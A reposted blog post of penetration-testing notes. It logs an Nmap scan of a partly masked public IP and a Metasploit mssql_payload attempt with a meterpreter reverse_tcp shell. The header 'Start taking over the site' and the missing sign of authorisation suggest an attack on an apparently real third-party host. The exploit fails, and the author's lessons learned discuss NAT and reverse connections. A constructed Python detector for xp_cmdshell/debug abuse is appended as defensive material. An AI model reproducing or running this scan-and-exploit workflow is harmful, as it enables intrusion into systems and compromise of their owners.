Penetration Testing Notes - 2013-07-13

Updated: 2022-10-01 17:27:33

Moved over from Sina

windows/mssql/mssql_payload

Run a scan
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间
NSE: Loaded 49 scripts for scanning.
Initiating Ping Scan at 09:36
Scanning 203.171.239.* [4 ports]
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:36
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed
Initiating SYN Stealth Scan at 09:36
Scanning 203.171.239.* [1000 ports]
Discovered open port 3389/tcp on 203.171.239.*
Discovered open port 80/tcp on 203.171.239.*
Discovered open port 3306/tcp on 203.171.239.*
Discovered open port 21/tcp on 203.171.239.*
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)
Initiating Service scan at 09:36
Scanning 4 services on 203.171.239.*
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 203.171.239.*
Retrying OS detection (try #2) against 203.171.239.*
Initiating Traceroute at 09:37
Completed Traceroute at 09:37, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:37
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed
NSE: Script scanning 203.171.239.*.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 09:37
Completed NSE at 09:37, 5.22s elapsed
NSE: Script Scanning completed.
Nmap scan report for 203.171.239.*
Host is up (0.043s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp closed smtp
80/tcp open http Microsoft IIS httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_html-title: Site doesn't have a title (text/html).
110/tcp closed pop3
3306/tcp open mysql MySQL 5.1.32-community
| mysql-info: Protocol: 10
| Version: 5.1.32-community
| Thread ID: 30457
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_Salt: B@Y";By^J5k<*[k+0O~O
3389/tcp open microsoft-rdp Microsoft Terminal Service
Device type: general purpose|media device
Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 50.00 ms 203.171.239.*
Read data files from: D:\metasploit\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds
Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)
Start taking over the site
Welcome to the Metasploit Web Console!
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 296 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 296 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/mssql/mssql_payload
>> info windows/mssql/mssql_payload
Name: Microsoft SQL Server Payload Execution
Version: 9669
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload information:
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.osvdb.org/557
http://www.securityfocus.com/bid/1281
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209
http://www.osvdb.org/15757
http://www.securityfocus.com/bid/4797
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf
>> use windows/mssql/mssql_payload
>> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
>> set RHOST 203.171.239.*
RHOST => 203.171.239.*
>> set LHOST 172.16.2.101
LHOST => 172.16.2.101
>> exploit
[*] Started reverse handler on 172.16.2.101:4444
[-] Exploit failed: The connection timed out (203.171.239.*:1433).
[*] Exploit completed, but no session was created.

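Lessons learned: the attempt failed because the remote server does not have port 1433 open. I suspect that even if the server did have port 1433 open, it would not necessarily succeed, because I am on an internal network that is mapped out through NAT, so the handler may not be able to receive the connection back. Whether this is so still needs to be verified by experiment.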
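The module description above states that the payload is written to disk through xp_cmdshell and the Windows debug method and is left in the System32 directory. As an added example (not part of the original post or of Metasploit), the following Python detection logic flags that behaviour in process-creation events. The event fields, sample events and file names are constructed for illustration.

```python
import ntpath
import re

# Constructed process-creation events (reduced Sysmon-style fields); not real logs.
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\WINDOWS\system32\cmd.exe"
SAMPLE_EVENTS = [
    {"parent": SQL, "image": CMD,
     "cmdline": r"cmd.exe /c echo EXAMPLE-DATA >> C:\WINDOWS\system32\EXAMPLE.tmp"},
    {"parent": SQL, "image": CMD,
     "cmdline": r"cmd.exe /c debug < C:\WINDOWS\system32\EXAMPLE.tmp"},
    {"parent": r"C:\WINDOWS\explorer.exe", "image": CMD,
     "cmdline": r"cmd.exe /c dir"},
    {"parent": SQL, "image": CMD,
     "cmdline": r"cmd.exe /c dir D:\backup"},
]

# debug / debug.exe / debug.com appearing as a word in the command line
DEBUG_RE = re.compile(r"\bdebug(?:\.exe|\.com)?\b", re.I)
# shell output redirection (> or >>) into the System32 directory
SYS32_WRITE_RE = re.compile(r">>?\s*\"?[a-z]:\\windows\\system32\\", re.I)


def classify(event):
    """Return (severity, reasons) for one process-creation event."""
    parent = ntpath.basename(event["parent"]).lower()
    child = ntpath.basename(event["image"]).lower()
    # xp_cmdshell runs its command in a cmd.exe child of the SQL Server process
    if parent != "sqlservr.exe" or child != "cmd.exe":
        return ("none", [])
    reasons = ["cmd.exe spawned by sqlservr.exe (xp_cmdshell)"]
    if DEBUG_RE.search(event["cmdline"]):
        reasons.append("debug invoked from the SQL Server shell")
    if SYS32_WRITE_RE.search(event["cmdline"]):
        reasons.append("output redirected into System32")
    return ("high" if len(reasons) > 1 else "medium", reasons)


def scan(events):
    """Return (index, severity, reasons) for every event worth an alert."""
    hits = []
    for i, event in enumerate(events):
        severity, reasons = classify(event)
        if severity != "none":
            hits.append((i, severity, reasons))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Any xp_cmdshell use is reported at medium severity, so servers with legitimate jobs that shell out need an allowlist on top of this.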

This article is reposted from 文东会's blog on 51CTO. Original link: http://blog.51cto.com/hackerwang/1247879 (to repost, please contact the original author yourself)


谢文东666